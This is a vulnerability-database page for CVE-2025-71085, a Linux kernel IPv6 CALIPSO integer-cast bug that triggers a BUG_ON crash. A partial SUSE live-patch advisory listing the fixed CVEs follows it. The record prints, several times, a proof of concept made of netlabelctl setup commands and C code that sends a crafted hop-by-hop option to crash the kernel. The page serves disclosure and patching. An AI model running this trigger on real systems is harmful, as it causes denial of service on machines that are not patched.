Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-71085 (GCVE-0-2025-71085)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-05-11 21:54
VLAI
EPSS
Title
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using `netlabelctl` tool:
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;
// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;
// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0);
Severity
No CVSS data available.
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 86f365897068d09418488165a68b23cb5baa37f2
(git)
Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 6b7522424529556c9cbc15e15e7bd4eeae310910 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 2bb759062efa188ea5d07242a43e5aa5464bbae1 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < c53aa6a5086f03f19564096ee084a202a8c738c0 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < bf3709738d8a8cc6fa275773170c5c29511a0b24 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 73744ad5696dce0e0f43872aba8de6a83d6ad570 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 58fc7342b529803d3c221101102fe913df7adb83 (git) |
|
| Linux | Linux |
Affected:
4.8
Unaffected: 0 , < 4.8 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.4 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "86f365897068d09418488165a68b23cb5baa37f2",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "6b7522424529556c9cbc15e15e7bd4eeae310910",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "58fc7342b529803d3c221101102fe913df7adb83",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T21:54:27.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
},
{
"url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
},
{
"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
},
{
"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
},
{
"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
},
{
"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
},
{
"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
}
],
"title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71085",
"datePublished": "2026-01-13T15:34:48.324Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-05-11T21:54:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-71085",
"date": "2026-05-27",
"epss": "0.00033",
"percentile": "0.09872"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-71085\",\"sourceIdentifier\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"published\":\"2026-01-13T16:16:08.117\",\"lastModified\":\"2026-03-25T18:57:30.837\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In the Linux kernel, the following vulnerability has been resolved:\\n\\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\\n\\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\\nnet/core/skbuff.c:2232 in pskb_expand_head().\\nThis bug is triggered as part of the calipso_skbuff_setattr()\\nroutine when skb_cow() is passed headroom \u003e INT_MAX\\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\\n\\nThe root cause of the bug is due to an implicit integer cast in\\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\\nbecomes negative, and pskb_expand_head() is passed a negative value for\\nnhead.\\n\\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\\n\\\"negative\\\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\\nby only using skb_cow() to grow headroom.\\n\\nPoC:\\n\\tUsing `netlabelctl` tool:\\n\\n netlabelctl map del default\\n netlabelctl calipso add pass doi:7\\n netlabelctl map add default address:0::1/128 protocol:calipso,7\\n\\n Then run the following PoC:\\n\\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\\n\\n // setup msghdr\\n int cmsg_size = 2;\\n int cmsg_len = 0x60;\\n struct msghdr msg;\\n struct sockaddr_in6 dest_addr;\\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\\n sizeof(struct cmsghdr) + cmsg_len);\\n msg.msg_name = \u0026dest_addr;\\n msg.msg_namelen = sizeof(dest_addr);\\n msg.msg_iov = NULL;\\n msg.msg_iovlen = 0;\\n msg.msg_control = cmsg;\\n msg.msg_controllen = cmsg_len;\\n msg.msg_flags = 0;\\n\\n // setup sockaddr\\n dest_addr.sin6_family = AF_INET6;\\n dest_addr.sin6_port = htons(31337);\\n dest_addr.sin6_flowinfo = htonl(31337);\\n dest_addr.sin6_addr = in6addr_loopback;\\n dest_addr.sin6_scope_id = 31337;\\n\\n // setup cmsghdr\\n cmsg-\u003ecmsg_len = cmsg_len;\\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\\n\\n sendmsg(fd, \u0026msg, 0);\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-617\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.8.1\",\"versionEndExcluding\":\"5.10.248\",\"matchCriteriaId\":\"C178EEDC-1906-4F84-B618-31B9B5CA4130\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.11\",\"versionEndExcluding\":\"5.15.198\",\"matchCriteriaId\":\"82159CAA-B6BA-43C6-85D8-65BDBC175A7E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.16\",\"versionEndExcluding\":\"6.1.160\",\"matchCriteriaId\":\"C10CC03E-16A9-428A-B449-40D3763E15F6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.2\",\"versionEndExcluding\":\"6.6.120\",\"matchCriteriaId\":\"43C3A206-5EEE-417B-AA0F-EF8972E7A9F0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.7\",\"versionEndExcluding\":\"6.12.64\",\"matchCriteriaId\":\"32BF4A52-377C-44ED-B5E6-7EA5D896E98B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.13\",\"versionEndExcluding\":\"6.18.4\",\"matchCriteriaId\":\"DC988EA0-0E32-457A-BF95-89BEB31A227B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F396E56-2772-41B8-917F-0C38C2C1641C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"F71D92C0-C023-48BD-B3B6-70B638EEE298\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"13580667-0A98-40CC-B29F-D12790B91BDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB5B7DFC-C36B-45D8-922C-877569FDDF43\"}]}]}],\"references\":[{\"url\":\"https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]}]}}"
}
}
SUSE-SU-2026:1088-1
Vulnerability from csaf_suse - Published: 2026-03-26 17:03 - Updated: 2026-03-26 17:03Summary
Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 4.12.14-122.255 fixes various security issues
The following security issues were fixed:
- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1088,SUSE-SLE-Live-Patching-12-SP5-2026-1088
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 4.12.14-122.255 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1088,SUSE-SLE-Live-Patching-12-SP5-2026-1088",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
